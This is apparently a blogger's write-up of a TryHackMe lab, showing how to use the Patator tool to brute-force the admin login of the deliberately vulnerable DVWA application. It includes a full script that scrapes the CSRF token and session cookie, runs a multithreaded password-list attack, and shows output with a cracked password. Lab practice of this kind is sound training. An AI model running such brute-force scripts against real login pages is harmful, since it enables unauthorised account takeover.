I was doing the TryHackMe Brute Force Heroes room and came across the Patator brute forcing tool. Getting it to successfully brute force the DVWA application was quite a feat for me, which led me to write this post.
I am using my own Kali Linux attack box. These instructions may not apply if you use the THM Attack Box.
Contrary to what the Task instructions say, I was able to get Python 3 to work pretty well with the patator tool. Using Python 2 led to a bunch of issues and wasted time.
# create a Python 3 virtual env
└─$ python3 -m venv env3
# activate env3
$ source env3/bin/activate
┌──(env3)─(kali㉿kali)
# install pycurl
└─$ pip install pycurl
# test pyCurl
┌──(env3)─(kali㉿kali)-
└─$ python
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pycurl
>>>
# Make a local copy of patator and remove the top line to force it to use the python version installed in the environment
# REMOVE THIS LINE
#!/usr/bin/python2
# Run Patator
┌──(env3)─(kali㉿kali)
└─$ ./patatol http_fuzz method=POST url=http://$TARGET/login.php body="username=admin&password=password&Login=Login&user_token=f9e590fd1a2070c99d99e3e8a563c180" header="Cookie: PHPSESSID=0b7gcem4r4mqugpuh7bf21hfmd; security=impossible" -x quit:fgrep!=login.php
/home/kali/tryhackme/Rooms/bruteforceheroes/./patatol:2601: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
from telnetlib import Telnet
<class '__main__.Controller_HTTP'>
13:08:45 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 13:08 EDT
13:08:46 patator INFO -
13:08:46 patator INFO - code size:clen time | candidate | num | mesg
13:08:46 patator INFO - -------------------------------------------------------
13:08:47 patator FAIL - xxx 70:-1 1.064 | | 1 | <class 'pycurl.error'> (49, "Couldn't parse CURLOPT_RESOLVE entry ''")
13:08:48 patator INFO - Hits/Done/Skip/Fail/Size: 0/1/0/1/1, Avg: 0 r/s, Time: 0h 0m 2sAdd the following dummy option to the command line to get past the above error.
resolve=target:127.0.0.1
e.g. ./patator http_fuzz method=POST resolve=target:127.0.0.1 url="http://${IP}/login.php"
We learned from the Burp discussion that the Response header of a failed login contains Location: login.php and that of a successful password breach contains the field Location: index.php. We use this information to exclude (ignore) all responses that have login.php in the Location: field.
The following switch excludes the failed login responses.
-x ignore:fgrep='Location: login.php'THE FINAL SCRIPT (as outlined in the Brute Forcing Patator Task)
IP= x.x.x.x
CSRF=$(curl -s -c dvwa.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSIONID"
patator http_fuzz method=POST --threads=64 timeout=10 url="http://${IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSIONID}; security=impossible" resolve=target:127.0.0.1 -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' THE CRACKED PASSWORD
└─$ ./run.sh
The CSRF is: cb8eb6397fd783c9362188fe68ee0049
The PHPSESSID is: cudu1518ggt4s1c7es4l4uodg3
/home/kali/tryhackme/Rooms/bruteforceheroes/./patator:2601: DeprecationWarning: ‘telnetlib’ is deprecated and slated for removal in Python 3.13
from telnetlib import Telnet
<class ‘__main__.Controller_HTTP’>
06:23:37 patator INFO – Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 06:23 EDT
06:23:37 patator INFO –
06:23:37 patator INFO – code size:clen time | candidate | num | mesg
06:23:37 patator INFO – ———————————————————————–
06:23:44 patator INFO – 302 281:0 0.217 | [PASSWORD] | 807 | HTTP/1.1 302 Found
06:23:45 patator INFO – Hits/Done/Skip/Fail/Size: 1/1136/0/0/1988, Avg: 148 r/s, Time: 0h 0m 7s
REFERENCES:
Cyber Learnings 
Leave a comment